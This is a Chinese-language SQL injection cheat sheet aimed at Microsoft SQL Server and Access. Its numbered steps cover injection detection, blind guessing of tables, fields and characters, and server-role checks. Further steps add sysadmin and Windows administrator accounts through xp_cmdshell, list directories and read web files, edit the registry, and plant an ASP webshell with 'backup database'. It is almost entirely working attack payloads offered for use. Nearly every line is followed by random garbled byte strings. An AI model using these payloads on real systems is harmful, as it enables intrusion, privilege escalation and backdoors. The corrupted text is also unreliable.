1.判断是否有注入;and 1=1 ;and 1=2 "IFg��RaP=
2.初步判断是否是mssql ;and user>0 P!�e=�b-T�
fu�4!�t3�1
3.注入参数是字符'and [查询条件] and ''=' `PlOwj@u0`
~3CVxbB^<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �"�0Q1�q�Z
(3;@^S4&�w
5.判断数据库系统 ?�S�� ts�H
U�yiJU~�r1
;and (select count(*) from sysobjects)>0 mssql ��h@1�!��T
q
\�O�
O�u
;and (select count(*) from msysobjects)>0 access ,_ .v_���
2K{�6iw"h�
~OypE4�./1
obo&1�Uv,/
6.猜数据库 ;and (select Count(*) from [数据库名])>0 L/�Vx~r�`P
,
�ZFE�(�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �i9�A�~�<�
[�6tS�YUZs
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 F�9fl�SeN�
rv7{Ow��_Y
9.(1)猜字段的ascii值(access) _�O]xey^�r
Q(Gl�{#�b�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 BR�v ��x[u
�FN^�F�v�Q
(2)猜字段的ascii值(mssql) X+82[Y,mB.
'V&Y[7A�eq
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 6.�c�^u5�;
Z(GfK0vU��
10.测试权限结构(mssql) /4irAG% Oj
��cg�{AMeW
�",Cr,�;]�
3tA�U?s�V!
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j/!H$0P�N�
R 9��4�^4I
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (u�1m]WY�L
&
E}mX��]t
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6�'-As=�iw
3V����<&|�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |j~lkz�PnV
\jU���|(DE
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �9K�uD(EJS
g(E"4M�@t!
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +^|iZb�ZKx
4JyM7ePND}
;and 1=(select IS_MEMBER('db_owner'));-- ]�9 w��76Z
j+IrqPK�C^
7^6u�G���6
�`'S0*kMT�
11.添加mssql和系统的帐户 !wz/c�M;��
��rNDrp@A>
;exec master.dbo.sp_addlogin username;-- #�]Y>KX2HG
;exec master.dbo.sp_password null,username,password;-- b;c�Ml���'
yYZxLJ=��'
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- yV_��wDeAz
~ 5�"JzT�
;exec master.dbo.xp_cmdshell 'net user username password 5�\fCd�|�
@��R��|�'X
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- z(y*�h�azK
�D<$�X�y�P
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 0E`1HP"�b�
nw:�-J1kWR
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ),}AI/j;zY
�c]k*}W3T�
V~�IIY�B7
�Dh�4
6o|P
12.(1)遍历目录 8jlL�UG:�g
~nLN�`�H�d
;create table dirs(paths varchar(100), id int) )FN;+"��IJ
B�=f�,QU��
;insert dirs exec master.dbo.xp_dirtree 'c:\' �&EGqgNl��
$t�q�J�/:I
;and (select top 1 paths from dirs)>0 1 �T<+d5[C
"_U��dB��G
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) I�o`P,�l�:
NE2pL@��sk
Hy:V��`>
�8�)*2@-Rp
(2)遍历目录 �2�-*V=E�l
SymwA��S�+
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- @D�^^��_1~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 B�h`N[�\�r
-7�H�^n#�]
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Z�6C=�T;w�
{PU!�=IkTS
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 URgk^nt�2p
��~�T7�B$$
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ���pW0d�B_
X��r6�3?�N
4LcX<B�U9�
sb�_oD{+gW
13.mssql中的存储过程 M,5j5�<�7�
�oc��bB&�
xp_regenumvalues 注册表根键, 子键 +y��o�b�)%
f"u�*D,/sS
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 `?�g`bN`Vn
s.Y4pWd5@�
xp_regread 根键,子键,键值名
�'7Nr8D4L
#m{{a]zm^
;exec xp_regread w.\�w�1:�d
f*{
YFg?*&
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 `vG,}Pt]��
JCcZu�wu[
xp_regwrite 根键,子键, 值名, 值类型, 值 3�ya1'qUC�
lE8&..~l$+
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Z�v_.na/^K
<:/&&��@�2
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 4D�%9Rc0 G
�����m"\:o
xp_regdeletevalue 根键,子键,值名 v0D��q�@Q1
�Y�b i%od&
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >h2%�[j��=
u�nJid8L�o
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 a� {}|�Bf<
�(6CN/A{qe
$8USy�Gi3J
4H5p��r���
14.mssql的backup创建webshell EC�dvX0*a
UX3BeU�i.)
use model >� oA?�6x
I)q,kP@�yY
create table cmd(str image); 4Wy��<?O�2
-[= d�rj9I
insert into cmd(str) values (''); p�M�E{jD�
n9�pN�6,o+
backup database model to disk='c:\l.asp'; �l$K,�#P<)
EM7+��VO(�
P�� o �jmC
i |{Dd%4vK
15.mssql内置函数 X1IeS��MAe
�I -�Xlx�<
;and (select @@version)>0 获得Windows的版本号 48�|s$�K�^
dC��=��)^(
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2�f��U$J>Y
Tu{��h<Zy
;and (select user_name())>0 爆当前系统的连接用户 *Ype>�x{�
-�~�eJn'�W
;and (select db_name())>0 得到当前连接的数据库 =.�y*�_Ja
22kp�l)vbU
�bifS� 2>c
JK�er//ng4
16.简洁的webshell ��7�r|(}�S
h�YQ_45Z*?
use model L=2y��57&Y
st"{M�\.p�
create table cmd(str image); n��~g)�I&�
|�Iu�npZ�V
insert into cmd(str) values (''); /�h v�4x9
ZKg{0��DY�
backup database model to disk='g:\wwwtest\l.asp';
